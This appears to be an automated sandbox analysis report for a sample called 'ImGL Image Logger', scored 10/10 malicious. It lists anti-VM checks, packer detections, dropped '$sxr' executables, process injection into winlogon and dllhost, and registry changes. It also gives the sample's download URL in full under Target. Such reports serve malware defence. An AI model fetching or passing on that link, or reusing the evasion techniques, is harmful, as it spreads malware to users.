hxxps://store2[.]gofile[.]io/download/96bc7856-5bef-437c-9a3d-9fb2b7ed3ea8/ImGL%20Image%20Logger[.]zip

Analysis

max time kernel
169s
max time network
170s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
18-03-2023 03:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://store2.gofile.io/download/96bc7856-5bef-437c-9a3d-9fb2b7ed3ea8/ImGL%20Image%20Logger.zip

Score

10^/10

agilenet evasion themida

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 2916 created 612	2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe	winlogon.exe
PID 5928 created 612	5928	$sxr-powershell.exe	winlogon.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

ImGL.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ImGL.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ImGL.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ImGL.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ImGL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ImGL.exe

Executes dropped EXE 4 IoCs

Processes:

b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe

pid process

2916 b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
5928 $sxr-powershell.exe
1976 $sxr-powershell.exe
2552 $sxr-powershell.exe
Loads dropped DLL 1 IoCs

Processes:

ImGL.exe

pid process

5012 ImGL.exe

pid	process
2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
5928	$sxr-powershell.exe
1976	$sxr-powershell.exe
2552	$sxr-powershell.exe

pid	process
5012	ImGL.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral3/memory/5012-681-0x0000024DE8810000-0x0000024DE995A000-memory.dmp	agile_net
behavioral3/memory/5012-693-0x0000024DE9CE0000-0x0000024DE9CF8000-memory.dmp	agile_net

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\c5b5f892-515e-4453-a73a-a05dde02712b\AgileDotNetRT64.dll	themida
C:\Users\Admin\AppData\Local\Temp\c5b5f892-515e-4453-a73a-a05dde02712b\AgileDotNetRT64.dll	themida
behavioral3/memory/5012-690-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp	themida
behavioral3/memory/5012-691-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp	themida
behavioral3/memory/5012-696-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp	themida
behavioral3/memory/5012-698-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp	themida
behavioral3/memory/5012-699-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp	themida
behavioral3/memory/5012-718-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp	themida
behavioral3/memory/5012-723-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp	themida
behavioral3/memory/5012-765-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp	themida
behavioral3/memory/5012-933-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp	themida

Drops file in System32 directory 6 IoCs

Processes:

b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe

description	ioc	process
File created	C:\Windows\System32\vcruntime140d.dll	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
File created	C:\Windows\System32\ucrtbased.dll	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

ImGL.exe

pid process

5012 ImGL.exe

pid	process
5012	ImGL.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 2916 set thread context of 776	2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe	dllhost.exe
PID 5928 set thread context of 5028	5928	$sxr-powershell.exe	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230318042949.pma	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\517ddabc-bb47-4e8a-8dd1-4c5bb5bbafff.tmp	setup.exe

Drops file in Windows directory 4 IoCs

Processes:

b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe

description	ioc	process
File created	C:\Windows\$sxr-powershell.exe	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-Uni.bat	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 64 IoCs

Processes:

ImGL.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 03000000020000000100000000000000ffffffff	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616257"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "6"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 01000000030000000200000000000000ffffffff	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	ImGL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	ImGL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	ImGL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	ImGL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	ImGL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	ImGL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80922b16d365937a46956b92703aca08af0000	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	ImGL.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exemsedge.exemsedge.exemsedge.exeidentity_helper.exeb3a0b3fc-606d-4f23-969e-c5623422c614.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe

pid	process
4316	powershell.exe
4316	powershell.exe
4224	msedge.exe
4224	msedge.exe
4244	msedge.exe
4244	msedge.exe
5688	msedge.exe
5688	msedge.exe
5800	identity_helper.exe
5800	identity_helper.exe
2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
776	dllhost.exe
776	dllhost.exe
776	dllhost.exe
776	dllhost.exe
2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
5928	$sxr-powershell.exe
5928	$sxr-powershell.exe
5928	$sxr-powershell.exe
5028	dllhost.exe
5028	dllhost.exe
5028	dllhost.exe
5028	dllhost.exe
5928	$sxr-powershell.exe
5928	$sxr-powershell.exe
1976	$sxr-powershell.exe
1976	$sxr-powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

ImGL.exe

pid process

5012 ImGL.exe

pid	process
5012	ImGL.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

Processes:

msedge.exe

pid	process
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exeb3a0b3fc-606d-4f23-969e-c5623422c614.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe

description	pid	process
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
Token: SeDebugPrivilege	2916	b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
Token: SeDebugPrivilege	776	dllhost.exe
Token: SeDebugPrivilege	5928	$sxr-powershell.exe
Token: SeDebugPrivilege	5928	$sxr-powershell.exe
Token: SeDebugPrivilege	5028	dllhost.exe
Token: SeDebugPrivilege	1976	$sxr-powershell.exe

Suspicious use of FindShellTrayWindow 15 IoCs

Processes:

msedge.exe

pid	process
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe
4244	msedge.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

ImGL.exe

pid process

5012 ImGL.exe
5012 ImGL.exe
5012 ImGL.exe
5012 ImGL.exe
5012 ImGL.exe
5012 ImGL.exe
5012 ImGL.exe
5012 ImGL.exe
5012 ImGL.exe

pid	process
5012	ImGL.exe
5012	ImGL.exe
5012	ImGL.exe
5012	ImGL.exe
5012	ImGL.exe
5012	ImGL.exe
5012	ImGL.exe
5012	ImGL.exe
5012	ImGL.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4244 wrote to memory of 116	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 116	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 1772	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 4224	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 4224	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
